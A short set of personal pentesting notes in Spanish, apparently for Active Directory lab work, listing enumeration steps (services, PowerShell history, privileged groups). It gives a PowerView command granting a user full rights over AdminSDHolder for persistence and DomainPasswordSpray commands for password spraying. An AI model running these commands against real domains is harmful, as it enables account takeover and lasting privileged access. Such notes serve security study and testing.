Analizar:

• Los servicios que se encuentran instalados (cuáles son sus versiones), que se ejecutan en el equipo, que tiene el usuario del equipo...

• Historial de Powershell

• Pertenencia a grupos con privilegios --> conseguir shell como Local Admin

Probar:

• AdminSDHolder -https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/adminsdholder

Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=Security,DC=local' -PrincipalIdentity Moe -Rights All -verbose

• password spraying -https://github.com/dafthack/DomainPasswordSpray/blob/master/DomainPasswordSpray.ps1

Invoke-DomainPasswordSpray -Password pass
Invoke-DomainPasswordSpray -PasswordList .\\Passwords.txt -Domain <Domain>